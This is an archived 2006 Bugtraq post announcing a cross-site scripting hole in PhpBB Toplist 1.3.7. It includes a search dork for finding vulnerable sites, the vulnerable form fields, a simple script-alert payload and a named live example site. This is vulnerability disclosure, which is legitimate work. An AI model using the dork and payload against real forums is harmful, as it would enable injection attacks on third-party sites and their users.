lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20061208165757.22918.qmail@securityfocus.com>
Date: 8 Dec 2006 16:57:57 -0000
From: starext@....com
To: bugtraq@...urityfocus.com
Subject: PhpBB Toplist 1.3.7 Xss Vuln.

# LiderHack.Org

# script name : PhpBB Toplist 1.3.7

#Dork :  toplist.php?f=toplistnew

# Risk : High

# Found By : St@...T

# Vulnerable file : Toplist.php

# New add sites  addres: toplist.php?f=toplistnew

#Name: [xss code] 
&
#Information:  [xss code]
&
#Name: <h1>Your name</h1>
&
#Name: <script>alert("yourmessage")</script>

#example sites : http://www.nfl-forum.net/toplist.php

Submit

# Thanks : Dekolax , ShaFuck31 , ST@...T , Dekolax , Swat_Hack , Maverick , Candark , Torlaq , Woheras , Siruas

# E-mail: Starext[at]msn[dot]com

             ##################### --Türküm -- ####################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ